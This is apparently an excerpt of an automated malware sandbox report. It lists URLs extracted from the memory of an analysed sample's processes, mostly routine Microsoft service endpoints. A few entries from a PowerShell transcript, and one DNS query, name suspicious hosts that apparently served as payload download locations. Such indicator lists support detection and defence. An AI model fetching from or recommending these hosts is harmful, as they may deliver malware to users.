Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://api.aadrm.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://api.cortana.ai
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://api.office.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://api.onedrive.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://augloop.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://cdn.entity.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://cortana.ai
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://cortana.ai/api
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://cr.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://dev.cortana.ai
Source: svchost.exe, 00000008.00000003.308889195.000001C41945C000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000003.308971660.000001C419459000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000008.00000003.308971660.000001C419459000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: svchost.exe, 00000008.00000003.308971660.000001C419459000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://directory.services.
Source: svchost.exe, 00000008.00000003.308889195.000001C41945C000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000008.00000002.309911672.000001C41945E000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000008.00000002.309911672.000001C41945E000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000008.00000002.309921606.000001C419462000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.308889195.000001C41945C000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000003.287038973.000001C419431000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pesterp
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000005.00000003.312830879.000000000517B000.00000004.00000001.sdmp String found in binary or memory: https://go.micro
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://graph.windows.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://graph.windows.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://login.windows.local
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://management.azure.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://management.azure.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://messaging.office.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://ncus.contentsync.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://officeapps.live.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://onedrive.live.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://osi.office.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://otelrules.azureedge.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://outlook.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://outlook.office.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://outlook.office365.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://roaming.edog.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://settings.outlook.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://staging.cortana.ai
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr String found in binary or memory: https://staviancjs.com/wp-forum/QOm4n2/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000008.00000002.309740186.000001C419413000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000008.00000003.309189585.000001C419456000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000008.00000003.309189585.000001C419456000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000008.00000003.287038973.000001C419431000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000008.00000002.309792794.000001C41943A000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://tasks.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://wus2.contentsync.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr String found in binary or memory: https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/
Source: unknown DNS traffic detected: queries for: thepilatesstudionj.com
